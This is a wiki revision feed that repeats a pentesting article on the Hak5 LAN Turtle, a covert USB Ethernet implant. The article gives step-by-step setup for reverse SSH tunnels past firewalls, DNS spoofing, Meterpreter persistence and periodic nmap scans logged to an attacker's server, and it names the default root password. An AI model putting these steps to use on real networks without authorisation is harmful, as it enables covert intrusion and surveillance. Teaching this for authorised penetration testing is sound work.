==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6082</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6082"/>
		<updated>2021-03-04T13:48:17Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Description */  added manually download turtle modules&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6081</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6081"/>
		<updated>2021-03-04T12:26:06Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Description */ Added updating firmware&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
